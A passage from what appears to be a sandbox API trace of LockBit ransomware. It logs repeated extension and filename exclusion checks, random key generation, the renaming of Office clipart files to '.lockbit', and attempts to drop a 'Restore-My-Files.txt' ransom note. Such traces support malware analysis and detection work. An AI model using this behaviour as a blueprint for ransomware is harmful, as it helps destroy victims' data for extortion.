lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.092] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.093] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.093] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.093] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF.lockbit") returned 72 [0139.093] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105974.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.093] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.093] malloc (_Size=0x40068) returned 0x3df0008 [0139.093] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4612) returned 1 [0139.093] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.094] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.094] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.094] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.094] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0139.098] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.098] malloc (_Size=0xa6) returned 0x77d7a8 [0139.099] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0139.099] free (_Block=0x77d7a8) [0139.099] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.099] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.099] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.099] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x274c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0106020.WMF", cAlternateFileName="")) returned 1 [0139.099] lstrcmpiW (lpString1=".", lpString2="J0106020.WMF") returned -1 [0139.099] lstrcmpiW (lpString1="..", lpString2="J0106020.WMF") returned -1 [0139.099] PathFindExtensionW (pszPath="J0106020.WMF") returned=".WMF" [0139.099] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.099] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.100] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.100] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0106020.WMF") returned 1 [0139.101] lstrcmpiW (lpString1="ntldr", lpString2="J0106020.WMF") returned 1 [0139.101] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0106020.WMF") returned 1 [0139.101] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0106020.WMF") returned -1 [0139.101] lstrcmpiW (lpString1="autorun.inf", lpString2="J0106020.WMF") returned -1 [0139.101] lstrcmpiW (lpString1="thumbs.db", lpString2="J0106020.WMF") returned 1 [0139.101] lstrcmpiW (lpString1="iconcache.db", lpString2="J0106020.WMF") returned -1 [0139.101] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.101] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned=".WMF" [0139.101] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.101] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.101] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.102] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.102] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF.lockbit") returned 72 [0139.102] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.103] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.103] malloc (_Size=0x40068) returned 0x3df0008 [0139.103] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10060) returned 1 [0139.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.103] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.104] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.104] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.186] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.186] malloc (_Size=0xa6) returned 0x77d7a8 [0139.186] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.188] free (_Block=0x77d7a8) [0139.188] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.188] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.188] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.188] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x16b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0106124.WMF", cAlternateFileName="")) returned 1 [0139.189] lstrcmpiW (lpString1=".", lpString2="J0106124.WMF") returned -1 [0139.189] lstrcmpiW (lpString1="..", lpString2="J0106124.WMF") returned -1 [0139.189] PathFindExtensionW (pszPath="J0106124.WMF") returned=".WMF" [0139.189] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.189] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.189] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0106124.WMF") returned 1 [0139.190] lstrcmpiW (lpString1="ntldr", lpString2="J0106124.WMF") returned 1 [0139.190] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0106124.WMF") returned 1 [0139.190] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0106124.WMF") returned -1 [0139.190] lstrcmpiW (lpString1="autorun.inf", lpString2="J0106124.WMF") returned -1 [0139.190] lstrcmpiW (lpString1="thumbs.db", lpString2="J0106124.WMF") returned 1 [0139.190] lstrcmpiW (lpString1="iconcache.db", lpString2="J0106124.WMF") returned -1 [0139.190] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.190] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned=".WMF" [0139.190] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.190] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.190] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.191] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.191] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF.lockbit") returned 72 [0139.191] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106124.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.192] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.192] malloc (_Size=0x40068) returned 0x3df0008 [0139.192] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5812) returned 1 [0139.192] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.193] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.193] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.193] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0139.197] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.197] malloc (_Size=0xa6) returned 0x77d7a8 [0139.197] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0139.197] free (_Block=0x77d7a8) [0139.197] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.197] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.197] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.197] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5bfc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0106146.WMF", cAlternateFileName="")) returned 1 [0139.197] lstrcmpiW (lpString1=".", lpString2="J0106146.WMF") returned -1 [0139.197] lstrcmpiW (lpString1="..", lpString2="J0106146.WMF") returned -1 [0139.197] PathFindExtensionW (pszPath="J0106146.WMF") returned=".WMF" [0139.197] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.197] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.197] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW 